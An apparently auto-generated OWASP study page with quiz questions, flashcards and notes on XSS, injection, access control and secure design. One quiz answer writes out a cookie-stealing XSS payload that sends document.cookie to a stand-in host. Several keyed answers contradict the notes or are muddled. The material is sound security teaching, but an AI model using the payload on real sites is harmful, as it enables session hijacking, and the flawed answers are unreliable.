OWASP Overview and Core Values
Questions and Answers

What should be ensured when storing sensitive data?

  • Use weak algorithms to increase processing speed.
  • Ensure that the cryptographic protection remains secure even if access controls fail. (correct)
  • Only store sensitive data that is outdated.
  • Sensitive data should be encrypted with any method available.

Which of the following practices supports good cryptographic storage design?

  • Storing plain text passwords for easy access.
  • Using strong approved Authenticated Encryption. (correct)
  • Keeping cryptographic keys publicly accessible.
  • Avoiding regulations on the use of cryptography.

What is a common issue related to insecure dependencies?

  • Using software that is vulnerable, unsupported, or out of date. (correct)
  • Knowing the version of dependencies accurately.
  • Monitoring component configuration regularly.
  • Regularly patching outdated software components.

Which action contributes to preventing issues related to dependencies?

Continuously monitoring for vulnerabilities. (B)

What is an ineffective approach to securing software components?

Patch management processes are insufficient or missing. (C)

What is the primary approach of Allow List Input Validation?

Block all user inputs unless explicitly allowed (A)

Which of the following is an example of a situation where Client Side Validation can be bypassed?

By editing headers and data in a browser's developer tools (A)

What is a major drawback of using Block List Input Validation?

It must be regularly updated to address new attack patterns (B)

What does injection in the context of application security refer to?

Executing unintended commands in an application (D)

Which statement best describes the nature of Allow List Input Validation?

It is less effective over time if not maintained (C)

How should an HTML sanitizer be utilized when handling user input?

By sanitizing larger HTML chunks provided by the user (B)

What is a common method attackers use to exploit broken access control?

Changing the primary key to another user's record (C)

Which type of privilege escalation involves accessing another user's data at the same level?

Horizontal Privilege Escalation (D)

What is a significant characteristic of negative security rules in input validation?

Require a comprehensive understanding of potential attacks (D)

Which of the following is a recommended prevention measure for access control issues?

Deny access to private resources by default (D)

Which of the following is NOT a potential interpreter type where injection can occur?

Excel (B)

What should access tokens do upon user logout to enhance security?

Be invalidated on the server (C)

What is an effective way to enforce access control mechanisms within an application?

Reuse access control mechanisms throughout the application (D)

Which of the following describes the practice of force browsing?

Attempting to view authenticated pages as an anonymous user (A)

What is a key reason to log access control failures?

To alert administrators when appropriate (A)

What does the principle of Defense in Depth primarily emphasize?

Implementing multiple barriers to manage risks (C)

What is the recommended outcome when a transaction fails?

Fail closed to prevent unauthorized access (A)

Which of the following is NOT a common attack related to broken access control?

Data encryption attacks (B)

Why should external systems be treated with caution?

They might vary in security posture and policies (D)

What role does Separation of Duties play in security?

It prevents fraud by clearly dividing responsibilities (C)

What criticism is associated with Security by Obscurity?

It relies solely on keeping security details hidden (B)

What is a key advantage of keeping security simple?

It reduces the attack surface and improves efficiency (D)

What should be avoided when developing secure systems?

Incorporating complex architectures unnecessarily (C)

What does failing securely prevent?

Unauthorised access during a failure (A)

What is a primary characteristic of Reflected XSS?

User input is included in HTML output without validation. (A)

Which of the following examples demonstrates a successful payload for stealing user sessions in an XSS attack?

new Image().src="http://ev.il/hijack.php?c="+encodeURI(document.cookie); (C)

What is the main risk associated with Stored XSS vulnerabilities?

They can impact multiple users who access stored input. (A)

In the context of XSS, what does DOM XSS primarily involve?

JavaScript frameworks dynamically incorporating problematic data. (B)

What is a common method used in an XSS redirect attack?

Changing the window location with JavaScript. (B)

Which link is an indication of a possible phishing attempt in the lottery scenario?

http://ev.il/hijack.php (B)

What is the aim of the 'document.body.background' payload in an XSS attack?

To change the background of the webpage to a malicious image. (A)

What generally happens when a user inputs data in an unsafe manner within a search field?

Potentially dangerous scripts may be executed. (A)

What is the primary mission of OWASP?

To improve the security of software (A)

Which of the following is NOT listed as a core value of OWASP?

Security Innovation (D)

Which XSS vulnerability allows an attacker to send a malicious script to a user?

Cross-Site Scripting (XSS) (D)

What are typical impacts of XSS attacks?

Steal a user's session (B)

What is a critical root cause of XSS vulnerabilities?

Including untrusted data into dynamic content without validation (D)

Which component is NOT part of the OWASP Top 10 list?

Cross-Origin Resource Sharing (A)

What principle does OWASP uphold regarding community participation?

Global participation is encouraged (D)

How does a user's browser wrongly trust the malicious script in an XSS attack?

The script comes from a trusted source (A)

Which action is a common characteristic of XSS attacks?

Redirecting users to malicious websites (D)

What does OWASP's commitment to openness entail?

All finances and code are transparently shared (C)

Flashcards

Strong Cryptographic Storage

Implementing robust security measures for storing sensitive data.

Authenticated Encryption

Using encryption methods that verify the authenticity and integrity of data during decryption.

Salted One-way Hash

Storing passwords as one-way hashes with a random salt, making them harder to crack.

Insecure Dependencies

Using outdated or vulnerable software components that can lead to security breaches.

Vulnerability Management

Regularly scanning for and patching vulnerabilities in software components to prevent attacks.

Broken Access Control Impact

Exploiting vulnerabilities in access control mechanisms can lead to unauthorized access to sensitive data, functionality, or user accounts.

Modifying URL, Internal State, or HTML

Attackers can manipulate these elements to bypass access controls and gain unauthorized access. For example, changing a URL parameter to access a restricted page.

Primary Key Manipulation

Attackers modify identifying keys within databases, like user IDs, to access data belonging to other users.

Privilege Escalation

An attacker gains unauthorized access with higher privileges, such as acting as an administrator when logged in as a regular user.

Vertical Privilege Escalation

Gaining access to a higher level of authority or permission within the system.

Horizontal Privilege Escalation

Gaining access to data or resources belonging to another user with equal privilege level.

Metadata Manipulation

Attackers tamper with metadata associated with access control tokens, cookies, or hidden fields to bypass security measures.

Access Control Design Principles

These principles help secure applications by enforcing access controls effectively and consistently.

Output Encoding

Transforming user-supplied input before displaying it to prevent malicious code execution. It ensures that user input is displayed as intended and not interpreted as code.

Input Validation

A security measure that checks user input against predefined rules to prevent malicious data from entering an application.

Allow List Validation

A type of input validation that only allows specific characters or patterns, blocking anything else. It's a proactive approach to preventing security issues.

Block List Validation

A type of input validation that blocks specific characters or patterns, allowing everything else. It's a reactive approach to security.

Injection

A type of attack where malicious code is injected into an application's input, causing it to execute the injected code instead of its intended instructions.

Client Side Validation

Validation performed on the user's browser before data is sent to the server. It's useful for improving user experience but is NOT a secure method to prevent attacks.

Interpreter

A program that translates code written in one language into another language, typically machine code, for execution.

Bypassing Client Side Validation

Attackers can bypass client-side validation by modifying the data being sent to the server before it's processed. They can either disable client-side validation or tamper with the data.

Defense in Depth

Multiple security layers protect against vulnerabilities. Various controls target different attack methods, making exploitation harder.

Fail Securely

When an action fails (transaction, code execution), the system should lock down (fail closed) to prevent unauthorized access or data compromise.

Don't Trust Services

Always treat external services with suspicion, assuming they may have different security practices and vulnerabilities. Never implicitly trust external systems.

Separation of Duties

Different people should manage different functions. For example, administrators should not also be users of the system they manage. This reduces the chance of fraud and misuse.

Security by Obscurity

This is a weak security approach. It relies on keeping details hidden, rather than using strong controls. If these hidden details are discovered, the system is vulnerable.

Keep Security Simple

Avoid overly complex security systems and code. Simplicity makes it easier to analyze, understand, and secure.

Attack Surface

The parts of a system that are exposed to potential attacks. Less exposed surface means fewer entry points for attackers.

Double Negatives

Avoid using complex logic with double negatives in security code. These can make errors hard to detect and security difficult to comprehend.

XSS (Cross-Site Scripting)

A type of web security vulnerability that allows attackers to inject malicious scripts into a website, which are then executed by the user's browser. This allows attackers to steal user data, hijack sessions, and manipulate the website's behavior.

Reflected XSS

A type of XSS where the attacker's malicious script is reflected back to the user's browser immediately after they submit it. This happens when a website includes unvalidated and unescaped user input directly into the HTML output.

Stored XSS

A type of XSS where the attacker's malicious script is stored persistently on the website's server and executed by other users when they view the affected content. This occurs when a website stores unsanitized user input that is later retrieved and displayed to other users.

DOM XSS

A type of XSS that leverages the Document Object Model (DOM) of web pages to manipulate the page's behavior based on attacker-controlled data. This often occurs in single-page applications and JavaScript frameworks where dynamic content is rendered.

XSS Attack Payload

The malicious script code injected by the attacker during an XSS attack. This code can perform various actions like stealing user data, redirecting the user, or defacing the website.

HTML Injection

A type of XSS attack where the attacker injects malicious HTML code into the website. This code can be used to create new HTML elements, manipulate existing elements, and even inject malicious scripts.

Unescaped User Input

User input that is inserted into a website without proper escaping or sanitization, making it vulnerable to XSS attacks. This is because special characters that have meaning in HTML can be used to inject malicious code.

Sanitization

The process of removing or encoding harmful characters from user input before it is displayed on the website. This prevents XSS attacks by ensuring that the input cannot be interpreted as malicious code.

What is OWASP?

The Open Web Application Security Project® (OWASP) is a non-profit foundation dedicated to improving software security. They achieve this through open-source projects, global chapters, and educational initiatives.

What are OWASP's core values?

OWASP operates with four core values: Openness, Innovation, Global reach, and Integrity.

What is OWASP Top 10?

It's a prioritized list of the most common and critical web application security risks. This list helps developers and security professionals focus on the most important vulnerabilities and address them.

What is Injection (OWASP Top 10 #1)?

An attacker can exploit injection vulnerabilities to gain unauthorized access to data or disrupt the application's functionality by injecting malicious code into inputs.

What is Sensitive Data Exposure (OWASP Top 10 #3)?

This happens when sensitive data like passwords or credit card details is not properly protected, exposing it to unauthorized access.

What is Broken Access Control (OWASP Top 10 #5)?

This vulnerability occurs when a user can access resources or perform actions they are not authorized to, violating access control rules.

What is Cross-Site Scripting (XSS) (OWASP Top 10 #7)?

An attacker injects malicious script into a website, which is then executed by unsuspecting users' browsers, potentially stealing their information.

How does XSS work?

When a web application includes untrusted data into dynamic content without proper validation, it creates an opportunity for an attacker to insert malicious code into the website.

What are the impacts of XSS?

XSS exploits can steal user sessions, sensitive data, rewrite web pages, and redirect users to malicious websites.

Explain Typical phishing email in context of XSS

Phishing emails frequently employ XSS attacks, luring users to click on links or download attachments that contain malicious scripts, leading to stolen data or compromised devices.

Study Notes

OWASP (Open Web Application Security Project)

  • OWASP is a non-profit foundation dedicated to improving software security
  • It utilizes a community-driven approach with open-source projects
  • The foundation offers numerous local chapters worldwide
  • OWASP boasts tens of thousands of members
  • It is a leading source of educational and training resources for developers and technologists to secure web applications

Core Values

  • Open: Transparency in finances and code is paramount
  • Innovative: Encourages exploration of new solutions for software security challenges
  • Global: Welcomes participation from anywhere in the world
  • Integrity: Fosters a respectful, supportive, truthful, and vendor-neutral community

OWASP Top 10

  • This is a prioritized list of the most critical web application security risks
  • The list is regularly updated to reflect emerging threats
  • The OWASP Top 10 serves as a guide for developers to strengthen their applications against common vulnerabilities

Cross-Site Scripting (XSS)

  • Attackers can inject malicious scripts into a web application
  • The user's browser executes the malicious script, thinking it originates from a trusted source
  • Attackers can steal user sessions, sensitive data, and rewrite HTML pages
  • Vulnerabilities arise when untrusted data is included in dynamic content without validation

Root Cause of XSS

  • Applications often incorporate untrusted data from HTTP requests into dynamic content
  • Failure to validate this data for malicious content creates the vulnerability

Typical XSS Impacts

  • Stealing user sessions
  • Accessing sensitive data
  • Manipulating web page content
  • Redirecting users to malicious websites

XSS Exploit Example

  • A web application's search field accepts input without validation
  • An attacker can enter malicious HTML code (e.g., an image tag with a malicious URL)
  • The application displays the attacker's code, executing it in the victim's browser

XSS Payload Examples

  • Stealing user sessions
  • Site defacing
  • Redirecting users

Forms of XSS

  • Reflected XSS: Includes unvalidated user input in HTML output
  • Stored XSS: Stores unsanitized user input, which other users see later
  • DOM (Document Object Model) XSS: Executes attacker-controlled data inserted in frameworks

XSS Prevention

  • Do not include user-supplied input directly in your output
  • Encode all user-supplied input
  • Use input validation (allow-listing) to specify acceptable input
  • Use HTML sanitizers for complex user input

Input Validation - Block List

  • This method blocks specific input characters or patterns
  • Drawback: Vulnerable to masking techniques

Input Validation - Allow List

  • Only allows specific characters or patterns
  • Advantage: Protects against future vulnerabilities
  • Disadvantage: Defining the acceptable input characters can be complex

Bypassing Client-Side Validation

  • Client-side validation is for convenience, not security
  • It can be easily bypassed by directly interacting with the back-end

Injection (Example: SQL Injection)

  • Tricking an application into including unintended commands in data sent to an interpreter
  • Interpreters Affected: Query languages (SQL, NoSQL, HQL, LDAP, XPath), Expression languages (SpEL, JSP/JSF EL), Template engines (Freemarker, Velocity), Command-line interfaces (Bash, PowerShell)

SQL Injection - Typical Impact

  • Bypassing authentication
  • Reading data without authorization
  • Manipulating data
  • Complete system takeover

Blind SQL Injection

  • Attackers don't get direct error messages
  • They use boolean conditions to deduce if the query succeeds or fails
  • This process takes time to complete and can be slow

Prevention for SQL Injection

  • Avoid constructing SQL statements with string manipulation
  • Utilize prepared statements, parameters, or parameterized queries
  • Where possible, use an API that avoids passing raw commands to the interpreter

Prevention (Other)

  • Security misconfiguration (missing hardening across the application stack): install the latest versions of application components, properly configure and secure permissions in cloud services, disable unnecessary features, and ensure default accounts/passwords have been disabled

Typical Flaws in Authentication

  • Allowing brute-force attacks
  • Implementing weak password recovery processes
  • Using insecure password storage methods (e.g., plain text, weak hashing)
  • Forgetting multi-factor authentication
  • Exposing session IDs in the URL

Password Strength Controls

  • Enforce a minimum password length and avoid forcing periodic password resets
  • Ban commonly breached passwords
  • Offer password visibility or clipboard pasting options

Secure "Forgot Password" Mechanism

  • Provide uniform messages for both existing and non-existent accounts
  • Use a side channel (e.g., phone call, email address) for password reset instructions
  • Utilize URL tokens for password reset

Secure Password Storage

  • Use bcrypt (or equivalent) password hashing algorithms
  • Set a reasonable work factor (high enough to slow brute-force cracking)
  • Use a salt (modern algorithms use automatic salts)
  • Consider using a pepper (for enhanced security, but less common)

Other Authentication Controls

  • Use TLS (secure communication protocol)
  • Implement strategies such as throttling for brute-force prevention
  • Require re-authentication for sensitive features
  • Offer two-factor or multi-factor authentication

Two-Factor Authentication (2FA)

  • Requires two out of three types of credentials (Something you know, Something you have, Something you are)

Broken Access Control

  • Applications incorrectly handling user permissions expose unauthorized functionality.
  • Possible impacts: unauthorized access, viewing sensitive files, modifying data, changing access rights, and other privileged actions.

Access Control Design Principles

  • Thoroughly design access controls up front
  • Enforce access checks for all requests
  • Deny access by default (unless explicitly granted access)
  • Enforce principle of least privilege
  • Avoid hardcoding roles
  • Log all access control events

Sensitive Data

  • Data such as passwords, credit card numbers, personally identifiable information (PII), and business secrets warrant special protection.
  • Following data protection regulations (e.g., GDPR, PCI DSS) is crucial

GDPR (General Data Protection Regulation)

  • A comprehensive data privacy regulation in the EU
  • Addresses the protection of personal data and its processing

Secure Cryptographic Storage Design

  • Store sensitive data only when needed, using strong encryption and salt
  • Ensure cryptographic protection even under compromised access controls
  • Protect secret keys from unauthorized access, following appropriate regulations for cryptography

Insecure Dependencies

  • Applications using vulnerable, outdated, or unmaintained dependencies increase attack surface
  • Use scanners and continuously monitor versions for known vulnerabilities and security bulletins

Insecure Configuration

  • Employ appropriate server hardening measures
  • Properly configure permissions and disable unused/unnecessary components
  • Disable or change default accounts and passwords

Secure Design Principles

  • Minimize attack surface area
  • Enforce strong default security configurations for new application features
  • Provide least privilege access to users
  • Employ in-depth security measures
  • Ensure secure failure states when transactions/code execution fail

Don't Trust Services

  • External services should not be trusted implicitly
  • Treat all external services as potentially hostile entities

Separation of Duties

  • Implementing a separation of duties framework for application administrators
  • Prevents single points of failure

Avoid Security by Obscurity

  • Hiding sensitive information or functionalities should never be the sole security measure
  • Other security controls should always be implemented alongside it

Keep Security Simple

  • Maintain an uncomplicated and straightforward design.
  • Prioritize clean code over intricate, complex approaches.
  • Avoid complex designs or double negatives where simpler approaches are available.

Description

Explore the Open Web Application Security Project (OWASP), a non-profit foundation dedicated to enhancing software security through community-driven initiatives. Learn about its core values, the significance of the OWASP Top 10, and how this organization empowers developers to address web application security risks effectively.
